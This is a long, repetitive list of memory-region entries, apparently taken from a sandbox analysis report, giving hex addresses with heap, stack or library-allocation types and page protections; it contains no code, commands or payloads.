2DD8000
|
heap
|
page read and write
|
||
|
715000
|
heap
|
page read and write
|
||
|
B1F000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2C19000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2CBE000
|
heap
|
page read and write
|
||
|
B2C000
|
heap
|
page read and write
|
||
|
1BC38000
|
heap
|
page read and write
|
||
|
2E8F000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
7FFD9B98D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1B70C000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2460000
|
trusted library section
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
518E000
|
stack
|
page read and write
|
||
|
12F6F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
|
4CE9000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2ACD000
|
stack
|
page read and write
|
||
|
527E000
|
stack
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
1B909000
|
heap
|
page read and write
|
||
|
239D5E6D000
|
heap
|
page read and write
|
||
|
19A98A89000
|
heap
|
page read and write
|
||
|
2C0E000
|
heap
|
page read and write
|
||
|
3370000
|
heap
|
page read and write
|
||
|
2C74000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
200F000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A984CE000
|
heap
|
page read and write
|
||
|
27EA000
|
trusted library allocation
|
page read and write
|
||
|
347E000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1990000
|
heap
|
page read and write
|
||
|
1B97000
|
heap
|
page read and write
|
||
|
19A98A83000
|
heap
|
page read and write
|
||
|
2D5E000
|
stack
|
page read and write
|
||
|
1BBFA000
|
heap
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
27DD000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A98A78000
|
heap
|
page read and write
|
||
|
2FA8000
|
heap
|
page read and write
|
||
|
19A98400000
|
trusted library allocation
|
page read and write
|
||
|
5A6F000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
7FFD9B982000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
239BBC90000
|
trusted library allocation
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
146E000
|
heap
|
page read and write
|
||
|
2CDF000
|
stack
|
page read and write
|
||
|
3164000
|
heap
|
page read and write
|
||
|
4A6C000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
339A000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
121E000
|
stack
|
page read and write
|
||
|
3940000
|
trusted library allocation
|
page read and write
|
||
|
239BD59E000
|
trusted library allocation
|
page read and write
|
||
|
2A8E000
|
stack
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
BF30A7D000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
284E000
|
stack
|
page read and write
|
||
|
28AF000
|
stack
|
page read and write
|
||
|
19A98C14000
|
heap
|
page read and write
|
||
|
D30000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
529C000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1DDA000
|
heap
|
page read and write
|
||
|
B1E000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
1B895000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
738C27E000
|
stack
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3430000
|
heap
|
page read and write
|
||
|
3378000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
33AF000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1DD0000
|
heap
|
page read and write
|
||
|
1C9E000
|
stack
|
page read and write
|
||
|
19A98487000
|
heap
|
page read and write
|
||
|
1DDE000
|
heap
|
page read and write
|
||
|
2ECE000
|
stack
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
EBA000
|
unkown
|
page execute read
|
||
|
1B6E4000
|
heap
|
page read and write
|
||
|
7FFD9B9A4000
|
trusted library allocation
|
page read and write
|
||
|
27E0000
|
heap
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
2C36000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
239BD578000
|
trusted library allocation
|
page read and write
|
||
|
2A90000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2CAA000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
341F000
|
stack
|
page read and write
|
||
|
731000
|
unkown
|
page execute read
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
239BD58C000
|
trusted library allocation
|
page read and write
|
||
|
52D0000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
61F000
|
stack
|
page read and write
|
||
|
43D000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
B0E000
|
heap
|
page read and write
|
||
|
47D000
|
stack
|
page read and write
|
||
|
3220000
|
heap
|
page read and write
|
||
|
239BB9E1000
|
heap
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
5430000
|
heap
|
page read and write
|
||
|
2A80000
|
heap
|
page read and write
|
||
|
BF30E7E000
|
stack
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
31C0000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
5CE000
|
stack
|
page read and write
|
||
|
AE1000
|
heap
|
page read and write
|
||
|
2C6E000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2CA0000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1431000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2CAA000
|
heap
|
page read and write
|
||
|
7FFD9BC19000
|
trusted library allocation
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
76E000
|
unkown
|
page write copy
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2A3D000
|
stack
|
page read and write
|
||
|
239BD560000
|
trusted library allocation
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
1BB79000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A98A58000
|
heap
|
page read and write
|
||
|
910000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
B38000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
7FFD9B9B4000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
BF3063D000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
4D86000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2CA2000
|
heap
|
page read and write
|
||
|
19A98A5E000
|
heap
|
page read and write
|
||
|
B52000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3AEE000
|
heap
|
page read and write
|
||
|
A55000
|
heap
|
page read and write
|
||
|
1B83A000
|
heap
|
page read and write
|
||
|
239BD580000
|
trusted library allocation
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A9870D000
|
heap
|
page read and write
|
||
|
2CA0000
|
heap
|
page read and write
|
||
|
1BB87000
|
heap
|
page read and write
|
||
|
7FFD9BA36000
|
trusted library allocation
|
page read and write
|
||
|
5350000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2BDD000
|
stack
|
page read and write
|
||
|
2035000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
AF1000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
B65000
|
heap
|
page read and write
|
||
|
B52000
|
heap
|
page read and write
|
||
|
3160000
|
heap
|
page read and write
|
||
|
357F000
|
stack
|
page read and write
|
||
|
13AE000
|
stack
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
4E00000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
A50000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
19A984A3000
|
heap
|
page read and write
|
||
|
2E40000
|
heap
|
page read and write
|
||
|
19A98467000
|
heap
|
page read and write
|
||
|
239BBB90000
|
heap
|
page read and write
|
||
|
792000
|
unkown
|
page readonly
|
||
|
3581000
|
heap
|
page read and write
|
||
|
239BB9AC000
|
heap
|
page read and write
|
||
|
2CBE000
|
heap
|
page read and write
|
||
|
1B6F1000
|
heap
|
page read and write
|
||
|
51CD000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
563E000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2CA2000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
26DD000
|
trusted library allocation
|
page read and write
|
||
|
19A98A6F000
|
heap
|
page read and write
|
||
|
239BB8D0000
|
unkown
|
page readonly
|
||
|
1AA0000
|
heap
|
page read and write
|
||
|
1DBF000
|
stack
|
page read and write
|
||
|
279D000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
4062000
|
heap
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
964000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
B25000
|
heap
|
page read and write
|
||
|
2DDE000
|
stack
|
page read and write
|
||
|
404000
|
unkown
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
298E000
|
stack
|
page read and write
|
||
|
7FFD9B9DB000
|
trusted library allocation
|
page execute and read and write
|
||
|
27B2000
|
trusted library allocation
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
34B0000
|
heap
|
page read and write
|
||
|
33DE000
|
stack
|
page read and write
|
||
|
1AD0000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
27D8000
|
trusted library allocation
|
page read and write
|
||
|
318A000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
27E2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A98A64000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2A50000
|
heap
|
page read and write
|
||
|
29A0000
|
heap
|
page read and write
|
||
|
763000
|
unkown
|
page readonly
|
||
|
2E2C000
|
heap
|
page read and write
|
||
|
2C1D000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
36B0000
|
trusted library allocation
|
page read and write
|
||
|
1B87F000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
D59000
|
heap
|
page read and write
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
239BB9C9000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2F04000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
B17000
|
heap
|
page read and write
|
||
|
27E0000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
B0F000
|
heap
|
page read and write
|
||
|
9B000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
239BBC00000
|
heap
|
page read and write
|
||
|
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
E33000
|
unkown
|
page execute read
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
1B324000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1B88A000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
239BB990000
|
heap
|
page read and write
|
||
|
B2A000
|
heap
|
page read and write
|
||
|
369E000
|
stack
|
page read and write
|
||
|
19A984C1000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
1833000
|
unkown
|
page execute read
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
B2C000
|
heap
|
page read and write
|
||
|
2C0F000
|
stack
|
page read and write
|
||
|
76E000
|
unkown
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
1B984000
|
heap
|
page read and write
|
||
|
29EF000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
292D000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
AC0000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1BB9C000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
24A0000
|
trusted library section
|
page read and write
|
||
|
7FFD9B9CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D0E000
|
stack
|
page read and write
|
||
|
2CA8000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1256D000
|
trusted library allocation
|
page read and write
|
||
|
AE0000
|
heap
|
page read and write
|
||
|
2A30000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A984BB000
|
heap
|
page read and write
|
||
|
1B967000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
239BB8D0000
|
unkown
|
page readonly
|
||
|
1AAE000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
239BB90C000
|
unkown
|
page readonly
|
||
|
2ED0000
|
heap
|
page read and write
|
||
|
1BC0F000
|
heap
|
page read and write
|
||
|
2AB0000
|
heap
|
page read and write
|
||
|
B1E000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2800000
|
heap
|
page read and write
|
||
|
15CF000
|
stack
|
page read and write
|
||
|
2CAF000
|
stack
|
page read and write
|
||
|
2BC0000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2C28000
|
heap
|
page read and write
|
||
|
339F000
|
stack
|
page read and write
|
||
|
3330000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
7FFD9B9B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CA2000
|
heap
|
page read and write
|
||
|
1B719000
|
heap
|
page read and write
|
||
|
19A9848A000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
239BD53E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
|
3680000
|
trusted library allocation
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
BF2FEFE000
|
stack
|
page read and write
|
||
|
2E40000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
2C6D000
|
stack
|
page read and write
|
||
|
309F000
|
stack
|
page read and write
|
||
|
2CA2000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
353F000
|
stack
|
page read and write
|
||
|
1B68D000
|
heap
|
page read and write
|
||
|
239BBC10000
|
trusted library allocation
|
page read and write
|
||
|
1BBBE000
|
heap
|
page read and write
|
||
|
3070000
|
heap
|
page read and write
|
||
|
2FAB000
|
heap
|
page read and write
|
||
|
B65000
|
heap
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
27DE000
|
trusted library allocation
|
page read and write
|
||
|
28DD000
|
stack
|
page read and write
|
||
|
2FEE000
|
stack
|
page read and write
|
||
|
239BD5CA000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
AE0000
|
heap
|
page read and write
|
||
|
2C3E000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2860000
|
heap
|
page read and write
|
||
|
63D000
|
stack
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
577F000
|
stack
|
page read and write
|
||
|
3320000
|
heap
|
page read and write
|
||
|
1B840000
|
heap
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2C70000
|
heap
|
page read and write
|
||
|
BF301FE000
|
stack
|
page read and write
|
||
|
7FFD9B9AB000
|
trusted library allocation
|
page execute and read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
738C17E000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
2990000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
7FFD9B9B2000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2CBE000
|
heap
|
page read and write
|
||
|
41D0000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
AF0000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
730000
|
unkown
|
page readonly
|
||
|
B2F000
|
heap
|
page read and write
|
||
|
774000
|
unkown
|
page read and write
|
||
|
2CBE000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1B6C6000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2AC8000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
4E2F000
|
stack
|
page read and write
|
||
|
19A98A89000
|
heap
|
page read and write
|
||
|
19A98A81000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2CAA000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2C4E000
|
stack
|
page read and write
|
||
|
239BD5B6000
|
trusted library allocation
|
page read and write
|
||
|
35D0000
|
heap
|
page read and write
|
||
|
2F0F000
|
stack
|
page read and write
|
||
|
B4C000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2A3E000
|
stack
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
2D6F000
|
stack
|
page read and write
|
||
|
7FFD9BA0C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
314F000
|
stack
|
page read and write
|
||
|
5CEC000
|
stack
|
page read and write
|
||
|
47AF000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
239BB9A0000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
27EC000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1BC32000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
7FFD9B99D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
239BB9DF000
|
heap
|
page read and write
|
||
|
7FFD9BB23000
|
trusted library allocation
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
AFF000
|
heap
|
page read and write
|
||
|
1B868000
|
heap
|
page read and write
|
||
|
289D000
|
stack
|
page read and write
|
||
|
12561000
|
trusted library allocation
|
page read and write
|
||
|
2AD0000
|
stack
|
page read and write
|
||
|
2CAD000
|
stack
|
page read and write
|
||
|
19A98A61000
|
heap
|
page read and write
|
||
|
B13000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A984BC000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
EBA000
|
unkown
|
page execute read
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
1995000
|
heap
|
page read and write
|
||
|
2AE3000
|
stack
|
page read and write
|
||
|
2BBF000
|
stack
|
page read and write
|
||
|
239D5E7A000
|
heap
|
page read and write
|
||
|
2C16000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3030000
|
heap
|
page read and write
|
||
|
7FFD9B9DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2CAD000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2BFF000
|
stack
|
page read and write
|
||
|
763000
|
unkown
|
page readonly
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19B000
|
stack
|
page read and write
|
||
|
239BD586000
|
trusted library allocation
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A98A5C000
|
heap
|
page read and write
|
||
|
2C0A000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
66D000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
7FFD9B9DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2F71000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
42000
|
unkown
|
page readonly
|
||
|
19A984B1000
|
heap
|
page read and write
|
||
|
645000
|
heap
|
page read and write
|
||
|
2CA8000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2886000
|
trusted library allocation
|
page read and write
|
||
|
6C40000
|
heap
|
page read and write
|
||
|
239BB9BE000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A9A3C6000
|
heap
|
page read and write
|
||
|
239BD5A0000
|
trusted library allocation
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3090000
|
heap
|
page read and write
|
||
|
67E000
|
stack
|
page read and write
|
||
|
19A984B7000
|
heap
|
page read and write
|
||
|
3397000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
47EE000
|
stack
|
page read and write
|
||
|
2940000
|
heap
|
page read and write
|
||
|
29DE000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A9A3D4000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A98A67000
|
heap
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
1BC40000
|
heap
|
page read and write
|
||
|
BF30C7D000
|
stack
|
page read and write
|
||
|
65D000
|
stack
|
page read and write
|
||
|
2C8F000
|
stack
|
page read and write
|
||
|
31AE000
|
stack
|
page read and write
|
||
|
2ABC000
|
stack
|
page read and write
|
||
|
3248000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1A80000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1BBC7000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
7FFD9B984000
|
trusted library allocation
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
51E0000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
19A98C12000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
19A984A8000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
19A98486000
|
heap
|
page read and write
|
||
|
19A984AA000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
27AA000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
7FFD9B983000
|
trusted library allocation
|
page execute and read and write
|
||
|
19A98A79000
|
heap
|
page read and write
|
||
|
3270000
|
heap
|
page read and write
|
||
|
239D5E30000
|
heap
|
page execute and read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
356E000
|
stack
|
page read and write
|
||
|
BF3073E000
|
stack
|
page read and write
|
||
|
BF3097E000
|
stack
|
page read and write
|
||
|
2F7D000
|
stack
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
